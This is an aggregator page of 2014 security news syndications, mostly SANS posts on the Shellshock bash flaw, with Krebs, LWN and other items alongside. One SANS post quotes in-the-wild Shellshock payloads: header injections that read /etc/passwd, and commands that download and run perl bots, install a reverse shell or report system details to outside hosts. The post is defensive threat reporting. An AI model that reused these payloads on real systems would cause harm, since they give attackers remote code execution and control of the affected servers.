SANS Internet Storm Center, InfoCON: yellow: Apple Released Update to Fix Shellshock Vulnerability http://support.apple.com/kb/DL1769, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: We Take Your Privacy and Security. Seriously.

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

“Please note that [COMPANY NAME] takes the security of your personal data very seriously.” If you’ve been on the Internet for any length of time, chances are very good that you’ve received at least one breach notification email or letter that includes some version of this obligatory line. But as far as lines go, this one is about as convincing as the classic break-up line, “It’s not you, it’s me.”

coxletter

I was reminded of the sheer emptiness of this corporate breach-speak approximately two weeks ago, after receiving a snail mail letter from my Internet service provider — Cox Communications. In its letter, the company explained:

“On or about Aug. 13, 2014, “we learned that one of our customer service representatives had her account credentials compromised by an unknown individual. This incident allowed the unauthorized person to view personal information associated with a small number of Cox accounts. The information which could have been viewed included your name, address, email address, your Secret Question/Answer, PIN and in some cases, the last four digits only of your Social Security number or drivers’ license number.”

The letter ended with the textbook offer of free credit monitoring services (through Experian, no less), and the obligatory “Please note that Cox takes the security of your personal data very seriously.” But I wondered how seriously they really take it. So, I called the number on the back of the letter, and was directed to Stephen Boggs, director of public affairs at Cox.

Boggs said that the trouble started after a female customer account representative was “socially engineered” or tricked into giving away her account credentials to a caller posing as a Cox tech support staffer. Boggs informed me that I was one of just 52 customers whose information the attacker(s) looked up after hijacking the customer service rep’s account.

The nature of the attack described by Boggs suggested two things: 1) That the login page that Cox employees use to access customer information is available on the larger Internet (i.e., it is not an internal-only application); and that 2) the customer support representative was able to access that public portal with nothing more than a username and a password.

Boggs either did not want to answer or did not know the answer to my main question: Were Cox customer support employees required to use multi-factor or two-factor authentication to access their accounts? Boggs promised to call back with an definitive response. To Cox’s credit, he did call back a few hours later, and confirmed my suspicions.

“We do use multifactor authentication in various cases,” Boggs said. “However, in this situation there was not two-factor authentication. We are taking steps based on our investigation to close this gap, as well as to conduct re-training of our customer service representatives to close that loop as well.”

This sad state of affairs is likely the same across multiple companies that claim to be protecting your personal and financial data. In my opinion, any company — particularly one in the ISP business — that isn’t using more than a username and a password to protect their customers’ personal information should be publicly shamed.

Unfortunately, most companies will not proactively take steps to safeguard this information until they are forced to do so — usually in response to a data breach.  Barring any pressure from Congress to find proactive ways to avoid breaches like this one, companies will continue to guarantee the security and privacy of their customers’ records, one breach at a time.

SANS Internet Storm Center, InfoCON: yellow: Shellshock: Updated Webcast (Now 6 bash related CVEs!), (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

I just published an updated YouTube presentation (about 15 min in length) with some of the shell shock related news from the last couple days:

YouTube: https://www.youtube.com/watch?v=b2HKgkH4LrQ
​PDF: https://isc.sans.edu/presentations/ShellShockV2.pdf
PPT: https://isc.sans.edu/presentations/ShellShockV2.pptx

Audio: 

 

As always, the material is published “create commons / share alike”, so feel free to use the slides.

 


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

LWN.net: Security advisories for Monday

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Debian has updated chromium-browser (multiple vulnerabilities).

Fedora has updated libvncserver
(F20: multiple vulnerabilities), nodejs (F20; F19:
denial of service), perl-Data-Dumper (F20: denial of service), and v8 (F20; F19: multiple vulnerabilities).

Mageia has updated bash (code
injection, command execution) and kernel
(MG3: denial of service).

Mandriva has updated perl-XML-DT (file overwrites).

openSUSE has updated bash (13.1, 12.3; 12.3;
13.1; 11.4; 13.2: multiple vulnerabilities), dbus-1
(13.1; 12.3: multiple vulnerabilities), kernel (11.4: multiple vulnerabilities), geary (13.1: TLS certificate issues), bash (11.4: command execution), mozilla-nss (13.1, 12.3: signature forgery),
NSS (11.4: signature forgery), php5 (11.4: multiple vulnerabilities), php5 (11.4: multiple vulnerabilities), srtp (13.1: denial of service), and wireshark (13.1, 12.3: multiple vulnerabilities).

Slackware has updated firefox
(multiple vulnerabilities), thunderbird: (multiple vulnerabilities) and seamonkey (multiple vulnerabilities).

SUSE has updated bash (SLE11, SLE10:
multiple vulnerabilities) and mozilla-nss
(SLES11 SP2: signature forgery).

Darknet - The Darkside: masscan – The Fastest TCP Port Scanner

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

masscan is the fastest TCP port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second. It produces results similar to nmap, the most famous port scanner. Internally, it operates more like scanrand, unicornscan, and ZMap, using asynchronous transmission. The major difference is that it’s…

Read the full post at darknet.org.uk

TorrentFreak: Photographer Sues Imgur For Failing to Remove Copyrighted Photos

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

imgurWhen it comes to online piracy most attention usually goes out to music, TV-shows and movies. However, photos are arguably the most-infringed works online.

Virtually every person on the Internet has shared a photo without obtaining permission from its maker, whether through social networks, blogs or other services.

While this is usually not a problem with a picture of the average Internet meme, when it comes to professional photography there can be serious consequences.

Earlier this year the Seattle-based artist Christopher Boffoli discovered that dozens of photos from his well-known “miniatures of food” series were being shared on Imgur. The photos were uploaded by a user named kdcoco who published them without permission.

This type of infringement is fairly common and usually easy to stop through a DMCA notice. In this case, however, that didn’t produce any results, so the photographer saw no other option than to take Imgur to court.

In a complaint (pdf) filed at a federal court in Seattle, Boffoli explains that he sent Imgur a DMCA takedown request on February 21. This seemed to work, as the image sharing site was quick to respond.

“The images have been marked for removal and will be deleted from all of our servers within 24 hours,” Imgur quickly replied.

One of Boffoli’s photos
boffoli

But following this initial reply nothing happened. According to the complaint all of the images remained online for several months.

“As late as September 2014 — more than 200 days after receiving Boffoli’s notice — Imgur had not removed or disabled access to the Infringing Content. To date, the Infringing Content is still accessible on Imgur’s servers,” the photographer’s lawyers write.

Aside from the infringing behavior of the Imgur user, Boffoli holds the image sharing service responsible for continued copyright infringement.

“Imgur had actual knowledge of the Infringing Content. Boffoli provided notice to Imgur in compliance with the DMCA, and Imgur failed to expeditiously disable access to or remove the Infringing Website,”

The photographer is asking the court to order an injunction preventing Imgur from making his work available. In addition, the complaint asks for actual and statutory damages for willful copyright infringement.

With at least 73 photos in the lawsuit, Imgur theoretically faces more than $10 million in damages. Thus far Imgur hasn’t responded to the complaint but at the time of writing the infringing photos are no longer available online.

It’s not the first time Boffoli has sued an online service for failing to remove his photos. He also filed lawsuits against Twitter, Google and others. These cases were settled out for court under undisclosed terms.

Time will tell whether Imgur will go for the same option, or if it will defend itself in court.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: yellow: Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far:

1 – Simple “vulnerability checks” that used custom User-Agents:

() { 0v3r1d3;};echo x22Content-type: text/plainx22; echo; uname -a;
() { :;}; echo ‘Shellshock: Vulnerable’
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit
() { :;}; /bin/bash -c “echo testing[number]“; /bin/uname -ax0ax0a
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 x22() { test;};echo x5Cx22Co
ntent-type: text/plainx5Cx22; echo; echo; /bin/cat /etc/passwdx22 http://[IP address]/cgi-bin/test.cgi

This one is a bit different. It includes the tested URL as user agent. But of course, it doesn’t escape special characters correctly, so this exploit would fail in this case. The page at 89.248.172.139 appears to only return an “empty page” message.

) { :;}; /bin/bash -c x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139×22

 

2 – Bots using the shellshock vulnerability:

This one installs a simple perl bot. Connects to irc.hacker-newbie.org port 6667 channel #bug

() { :; }; x22exec(‘/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b
0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0
b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http
://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt’)x22;” “() { :; }; x22exec(‘/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/sh
ock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.
com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http:
//xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt’)x22;

3 – Vulnerability checks using multiple headers:

GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 [ipaddress]
Host: () { :; }; ping -c 3 [ipaddress]
Referer: () { :; }; ping -c 3 [ipaddress]

4 – Using Multiple headers to install perl reverse shell (shell connects to 46.246.34.82 port 1992 in this case)

GET / HTTP/1.1
Host: [ip address]
Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl
Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl

5 – Using User-Agent to report system parameters back (the IP address is currently not responding)

GET / HTTP/1.0
Accept: */*
aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Host: () { :; }; wget -qO- 82.221.99.235 -U=”$(uname -a)”
Cookie: () { :; }; wget -qO- 82.221.99.235 -U=”$(uname -a)” 

6 – User-Agent used to install perl box

GET / HTTP/1.0
Host: [ip address]
User-Agent: () { :;}; /bin/bash -c “wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*

 

 


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

LWN.net: LibreSSL: More Than 30 Days Later

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

Ted Unangst has posted an update
on LibreSSL development
. “Joel and I have been working on a
replacement API for OpenSSL, appropriately entitled ressl. Reimagined SSL
is how I think of it. Our goals are consistency and simplicity. In
particular, we answer the question ‘What would the user like to do?’ and
not ‘What does the TLS protocol allow the user to do?’. You can make a
secure connection to a server. You can host a secure server. You can read
and write some data over that connection.

Raspberry Pi: CNBC visit Pi Towers

This post was syndicated from: Raspberry Pi and was written by: Liz Upton. Original post: at Raspberry Pi

At the start of September, a film crew from CNBC came to visit Cambridge. They spent some time with us at Pi Towers, and came to the Cambridge Jam the next day to talk to some of the kids there who use the Raspberry Pi. They produced two short videos, both full of footage from the Jam and our office – see how many familiar faces you can spot!

SANS Internet Storm Center, InfoCON: yellow: Shellshock: We are not done yet CVE-2014-6277, CVE-2014-6278, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

With everybody’s eyes on bash vulnerabilities, two new problems have been found [1]. These problems have been assigned CVE-2014-6277 and CVE-2014-6278. These issues are unrelated to the environment variable code injection of shellshock, but could also lead to code execution.

I hope you are keeping good notes as to what systems use bash and how as you are patching. Looks like bash will keep us busy for a bit.

[1] http://www.openwall.com/lists/oss-security/2014/09/25/32


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: yellow: Shellshock: Vulnerable Systems you may have missed and how to move forward, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

By now, I hope you are well on your way to patch your Linux systems for the bash code injection vulnerabilities. At this point, you should probably dig a bit deeper and try to find more “hidden” places that may be vulnerable. First of all, a quick list of things that are not vulnerable:

  • iOS, Android and many similar systems that use ash instead of bash.
  • Many systems are vulnerable, but the vulnerability is not exposed by default. In this case, patching is less urgent but should still be done as soon as patches are available. For example in OS X, there is no web server installed by default, and the DHCP client does not call shell scripts the way Linux does. Solaris uses ksh by default.
  • Many small embedded systems use busybox, not bash, and are not vulnerable.

Now which are the systems you may have missed in your first quick survey? First of all, vulnerability scanners will only find the low hanging fruit for this one, in particular earlier on. There are many larger web applications that have a couple of small cgi-bin scripts that are easily missed.

  • In Apache, look for the ExecCGI anywhere in your Apache configuration (not just httpd.conf, check files that are included by httpd.conf like virtual host configurations). If possible, remove ExecCGI if it was just setup by a default install.
  • Check if /bin/sh is a symlink to /bin/bash, or worse, a copy of /bin/bash. Just to make sure, try the exploit against other shells on the system (I have seen admins rename bash for convenience…)
  • While Android is not vulnerable by default, it is possible to install bash on Android
  • Even Windows can be made vulnerable, if you install tools like cygwin and expose them via a web server
  • “larger” embedded devices, unlike the small devices based on busybox, do sometimes include bash. Depending on how much access you have to the device, this can be hard to figure out
  • cgi web applications that are written in languages other then bash, but call bash (e.g. via exec(), popen() or similar commands.

And some good news: The signature “() {” for the exploit is actually better then I thought originally. Turns out that added spaces or other modifications to this string will break the exploit. 

So in short, your priority list should look like:

  • If today, you find exposed bash scripts in a publicly reachable server in cgi-bin: Assume the server is compromised.
  • Focus on web servers. Patch all web servers as soon as possible even if you currently don’t use cgi-bin. It is too easy to miss a script.
  • Any vulnerable system that uses restricted ssh shells
  • Any vulnerable system that is used outside your perimeter (to avoid DHCP attacks)

Moving forward: The idea of writing web applications in bash (or other shell scripting langagues) is pretty dangerous in the first place. It should be done with care, and if possible, try to use a different languages (perl, php, python) as they provide better input validation libraries. SELinux was mentioned as a counter measure, but in this case, it may not work quite as well as hoped. Regardless, learn how to use it and don’t just turn it off the first time it gets in the way. Systems like web application firewall and IPSs are very useful in a case like this for virtual patching. Make sure you have these systems in place, even if for the most part, you use them just to alert and log and less to block.

Fellow handler Rob put together this list of “likely to be missed” machines:

  • web content control servers
  • e-mail gateways
  • proxy servers
  • web application firewalls (WAFs)
  • IPS sensors and servers
  • Wireless Controllers
  • VOIP Servers
  • Firewalls
  • Enterprise class routers or switches (yes, really)
  • Any Virtual Machine that you got as an OVA or OVF from a vendor


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Schneier on Security: NSA Patents Available for License

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s a new article on NSA’s Technology Transfer Program, a 1990s-era program to license NSA patents to private industry. I was pretty dismissive about the offerings in the article, but I didn’t find anything interesting in the catalog. Does anyone see something I missed?

My guess is that the good stuff remains classified, and isn’t “transferred” to anyone.

Slashdot thread.